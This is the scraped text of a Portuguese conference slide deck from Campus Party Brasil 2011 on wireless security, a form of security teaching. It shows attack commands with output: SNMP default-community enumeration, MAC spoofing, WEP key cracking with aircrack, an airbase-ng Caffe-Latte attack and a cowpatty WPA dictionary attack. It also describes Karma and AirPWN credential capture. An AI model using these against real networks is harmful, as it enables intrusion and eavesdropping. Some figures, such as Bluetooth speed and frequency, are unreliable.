Cpbr2011

Perfil
● Analista de segurança desde 1992
●Pesquisador em áreas como Forense Computacional,
Smartcards, Redes sem fio e Pen-Test.
●Coordenador de grupos de resposta à incidentes em
governo e iniciativa privada
●Livros sobre Segurança de rede e Redes sem fio (Wifi e
Bluetooth)
● Auditor da AC Raiz da ICP-Brasil
●Autor e Co-autor de ferramentas como Chkrootkit, BTSearch
e Beholder.

Agenda

● Definições de redes sem fio
● Principais características
● Aspectos de segurança

●
Wi-Fi
● Bluetooth

● Infravermelho

● WiMax

● RFID

● Celular (GSM/TDMA/CDMA, etc.)

● ZigBee (802.15.4)

● UWB (802.15.3)

● Wibree (Nokia)

Bluetooth
“Alcance padrão de 10 a 250 metros”

© wifi toys

Bluetooth

“Alcance padrão de 10 a 250 metros”

Características de redes Wi-Fi

Wi-Fi usa faixa Industrial, Scentific&Medical (ISM)
902 928 MHz
2.4 2.485 GHz (2.4 a 2.5 GHz no Brasil)
5.150 5.825 GHz

WiMax (802.16/a) usam faixas licenciadas (10-66/2-10Ghz)

Características de redes Wi-Fi

●
IEEE 802.11
Padrões atuais:
802.11b 11Mb 2.4Ghz
802.11a 54Mb 5.1GHz
802.11g 54Mb 2.4Ghz
802.11i - Mecanismos de segurança
802.1x – Mecanismos de autenticação, uso
em redes cabeadas e sem fio
802.11n – Aumento da velocidade, 108Mb
nominais.

Canais - 802.11b

Canal Freqüência
1 2.412
2 2.417
3 2.422
4 2.427
5 2.432
6 2.437
7 2.442
8 2.447
9 2.452
10 2.457
11 2.462
12 2.467
13 2.472
14 2.484

Canais - 802.11a/b/g
$ iwlist wlan0 freq
wlan0     24 channels in total; available frequencies :
          Channel 01 : 2.412 GHz
          Channel 04 : 2.427 GHz              Channel 36 : 5.18 GHz
          Current Frequency=2.422 GHz (Channel 3)

Modelos de uso
Infraestrutura

Modelos de uso

Rede Aberta – Broadcast SSID

Nome da rede

Modelos de uso
Rede Aberta – Broadcast SSID
# iwlist wlan0 scan
wlan0 Scan completed :
Cell 01 - Address: 00:07:40:XX:XX:XX
ESSID:"PAIVA"
Mode:Master
Channel:3
Frequency:2.422 GHz (Channel 3)
Quality=61/100 Signal level=-71 dBm Noise level=-86 dBm
Encryption key:on
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
48 Mb/s; 54 Mb/s

Cell 02 - Address: 00:15:E9:XX:XX:XX
ESSID:"tamires"
Mode:Master
Channel:6
Encryption key:on
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s
48 Mb/s; 54 Mb/s

Modelos de uso

Rede Fechada – Broadcast desabilitado

Nome da rede

09:46:02 2422 202dB Beacon () ESS CH: 1
09:46:02 2422 201dB Beacon () ESS CH: 1
09:46:02 2422 198dB Beacon () ESS CH: 1
09:51:00 2422 184dB Beacon (dlink) ESS CH: 11
09:51:01 2422 185dB Beacon (dlink) ESS CH: 11
09:51:01 2422 186dB Beacon(drink) ESS CH: 11

Modelos de uso
Rede Fechada – Broadcast desabilitado
# iwlist wlan0 scan
Cell 02 - Address: 00:13:60:7D:CF:10
ESSID:""
Mode:Master
Channel:5
Encryption key:on
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (1) : TKIP
Authentication Suites (1) : 802.1x

Cell 03 - Address: 00:14:6A:7C:15:B0
ESSID:""
Mode:Master
Channel:44
Encryption key:on
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (1) : TKIP
Authentication Suites (1) : PSK

Wired Equivalent Privacy - WEP

Wi-Fi Protected Access - WPA

● Disponível antes do padrão 802.11i

● Dois tipos
– WPA-PSK(2) - Chave previamente compartilhada
– WPA(2) – Enterprise (exige 802.1x)

WPA(2) - PSK
chaves previamente compatilhadas

802.1x (Extensible Authentication Protocol -
EAP)

WPA/WPA2
Enterprise

802.1x ana
pedro
jonas
jose
...

login: ana
password: ********

Redes sem fio
Principais problemas

 Configuração padrão (senhas, nome da
rede, uso de DHCP, SNMP, etc)
 Métodos de filtragem ineficientes
 Fragilidade do modelo WEP
 Escuta do tráfego
 Negação de serviço
 Problemas com WPA e 802.1x

Configurações de fábrica -
SNMP
snmpwalk -Os -c public -v 1 192.168.0.1 system

sysDescr.0 = STRING: Netgear ProSafe DualBand
Wireless Firewall FWAG114
sysObjectID.0 = OID: enterprises.0
sysUpTime.0 = Timeticks: (699775) 1:56:37.75
sysContact.0 = STRING:http://www.netgear.com
sysName.0 = STRING:
sysLocation.0 = STRING:
sysServices.0 = INTEGER: 6

Configurações de fábrica -
SNMP
snmpwalk -On -c public -v 1 192.168.0.1 .1.3.6.1.2.1.4.22.1.2.3
.1.3.6.1.2.1.4.22.1.2.3.192.168.0.5 = STRING: 0:c:41:a:25:20
.1.3.6.1.2.1.4.22.1.2.3.192.168.0.2 = STRING: 8:0:46:ba:8:cb
.1.3.6.1.2.1.4.22.1.2.3.192.168.0.3 = STRING: 0:50:56:c0:0:1
.1.3.6.1.2.1.4.22.1.2.3.192.168.0.4 = STRING: 0:15:0:41:9d:e5
.1.3.6.1.2.1.4.22.1.2.3.192.168.0.6 = STRING: 0:d0:c4:1d:25:20
.1.3.6.1.2.1.4.22.1.2.3.192.168.0.8 = STRING: 0:22:2d:2b:e3:1d
.1.3.6.1.2.1.4.22.1.2.3.192.168.0.7 = STRING: 0:04:e2:8c:38:04
.1.3.6.1.2.1.4.22.1.2.3.192.168.0.11 = STRING: 1:03:dc:c1:17:d9
.1.3.6.1.2.1.4.22.1.2.3.192.168.0.9 = STRING: 0:0c:df:29:1d:60
.1.3.6.1.2.1.4.22.1.2.3.192.168.0.10 = STRING: 0:a4:9:a5:b1:10

Desabilitar difusão de SSID

23:05:16.386193 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:16.488612 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11
23:05:17.321039 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3
23:05:17.629271 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3

23:05:17.802928 Probe Request (NETGEAR) [1.0 2.0 5.5 11.0 Mbit]
23:05:17.887420 Assoc Request (NETGEAR) [1.0 2.0 5.5 11.0 Mbit]

Nome da rede
CH 10 ][ Elapsed: 9 mins ][ 2009-08-28 14:24

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:07:40:4D:1A:5C 103 322 522 0 3 54 WEP WEP Homenet54
00:19:E0:64:DC:10 101 330 3 0 11 11 . WPA2 CCMP PSK PCSL
00:1F:33:CD:CA:4A 101 177 0 0 11 54 . WPA TKIP PSK NETGEAR
00:1B:11:50:2F:2E 86 461 24 0 6 54 . WEP WEP OPN dlink
00:16:B6:47:CF:B9 -1 0 570 0 6 -1 OPN <length: 0>

BSSID STATION PWR Rate Lost Packets Probes

00:07:40:4D:1A:5C 00:1B:77:7B:82:27 89 11 - 1 107 623
00:16:B6:47:CF:B9 00:23:12:05:64:C1 104 0 - 5 62 1343 linksys

Filtro por MAC
$ ifconfig wlan0
wlan0     Link encap:Ethernet HWaddr 00:0C:41:E3:5F:5A
          inet addr:192.168.11.3  Bcast:192.168.11.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:842 errors:0 dropped:0 overruns:0 frame:0
          TX packets:637 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:152984 (149.3 KiB)  TX bytes:69539 (67.9 KiB)

c:> ipconfig /all
Windows 2000 IP Configuration
[...]

Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : xxx.com.br
Description . . . . . . . . . . . : 3Com EtherLink XL 10/100 PCI
For Complete PC Management NIC (3C905C-TX)
Physical Address. . . . . . . . . : 00-04-76-16-3F-DB

Filtro por MAC
Linux
# ifconfig ath0 hw ether 00:00:00:00:00:01

FreeBSD
# ifconfig xl3 ether 00:00:00:00:00:01

OpenBSD/NetBSD
# wiconfig wi0 -m 00:00:00:00:00:01

Fragilidade do WEP
# time aircrack trafego.cap (72MB bytes ~3 horas de captura)
       aircrack 2.1
   * Got  264394! unique IVs | fudge factor = 2
   * Elapsed time [00:00:01] | tried 0 keys at 0 k/m
KB    depth   votes
0    0/  2   46(  28) 20(  15) 97(  13) D8(  12) DB(  10) BE(   8) 38(   5)
1    0/  2   41(  30) 97(  18) 4D(  13) D8(  13) 7E(  12) 91(  12) 86(   9)
2    0/  2   4E(  65) 51(  55) 0F(  15) 48(  15) B3(  15) 53(   9) F0(   5)
3    0/  2   54(  58) E9(  48) DA(  28) F6(  21) F3(  16) D1(  15) F4(  15)
4    0/  1   41( 174) 5F(  41) 9A(  28) 9B(  24) 50(  22) A4(  21) F5(  21)
                 KEY FOUND! [ 46414E5441 ]
real    0m31.939s
user    0m0.706s
sys     0m0.533s

AP Desligado
airbase-ng -c 11 -L -e virus.exe -W 1 wlan1
23:11:31 Created tap interface at0
23:11:31 Access Point with BSSID 00:21:29:65:B8:45 started.
23:12:25 Got 140 bytes keystream: 00:23:12:D7:DA:F8
23:12:25 SKA from 00:23:12:D7:DA:F8
23:12:25 Client 00:23:12:D7:DA:F8 associated (WEP) to ESSID: "virus.exe"
23:12:25 Starting Caffe-Latte attack against 00:23:12:D7:DA:F8 at 100 pps.
23:12:36 Client 00:23:12:D7:DA:F8 associated (unencrypted) to ESSID: "virus.exe"

Escuta de tráfego – Rede aberta

# tcpdump -i eth0 -s 1700
tcpdump: WARNING: eth0: no IPv4 address
assigned
tcpdump: listening on eth0, link-type EN10MB
(Ethernet), capture size 1700 bytes
17:09:38.193741 IP (tos 0x0, ttl 128, id 49930,
offset 0, flags [DF], length:
48)192.168.11.2.3597 > 200.155.13.26.http: S
[tcp sum ok] 3524687372:3524687372(0) win 16384
<mss 1460,nop,nop,sackOK>

Problemas com WPA

# tcpdump -w trafego.log

# cowpatty -f /usr/share/dict/word -r trafego.log -s NETGEAR
cowpatty 2.0 - WPA-PSK dictionary attack.
<jwright@hasborg.com>
Collected all necessary data to mount crack against passphrase.
Starting dictionary attack. Please be patient.

Karma
KARMA includes patches for the Linux MADWifi driver to
allow the creation of an 802.11 Access Point that responds
to any probed SSID. So if a client looks for 'linksys', it is
'linksys' to them (even while it may be 'tmobile' to someone
else). Operating in this fashion has revealed vulnerabilities
in how Windows XP and MacOS X look for networks, so
clients may join even if their preferred networks list is empty.

●
●Fornece DHCP
Fornece DHCP
● Captura credênciais POP3/FTP
● Captura credênciais POP3/FTP
● Redireciona HTTP para server malicioso ou atua
● Redireciona HTTP para server malicioso ou atua

como proxy transparente
como proxy transparente

AirPWN

..The configurations were:

* HTTP 100% of the screen
* HTTP replacing all images
* HTTP background via CSS

* HTTP "owned" graphic, replacing all images
* HTTP javascript alert boxes, letting people know just how pwned they were
* FTP banners (while this worked, nobody pays attention to FTP banners so
we abandoned this quickly)

Facilidade de acesso
 Rede aberta com DHCP ativo
 Rede aberto sem DHCP ativo
 Controle de acesso baseado em IP e/ou endereço
MAC
 Uso de WEP
 Uso de WPA-PSK
 Uso de 802.1x (usuário/senha)

Fácil

Difícil

GSM 2.5G x 3G

GSM 2.5G
Redes de dados: GPRS/EDGE
Freqüências: 850, 900, 1800, 1900 MHz
Velocidade: 384Kbps

GSM 3G
Redes de dados: HSDPA/UMTS
Freqüências: 850, 1900, 2100 MHz
Velocidade: 7.2 Mbps

3GPartnershipProject (4G)

LTE
(Long Term Evolution)

Velocidade: 326.4 Mbit/s

Bluetooth
Características

Freqüência: 2.4 MHz
Velocidade: 2.0 Kbps
Distâncias: 10-250 Mts

Tipo de Rede
Ponto a ponto
Uso de concentrador
7 + 1 participantes

Wireless Access in Vehicular Environments
(WAVE)
Permite comunicação veículo-p/-veículo (V2V) e veículo-p/-
infraesttrutura (V2I)
Feito para funcionar em situações adversas com baixa latência,
distâncias médias e alta mobilidade

Wireless Access in Vehicular Environments
(WAVE)

Cpbr2011

Recomendados

Recomendados

Mais conteúdo relacionado

Destaque

Destaque (17)

Mais de Campus Party Brasil

Mais de Campus Party Brasil (20)

Cpbr2011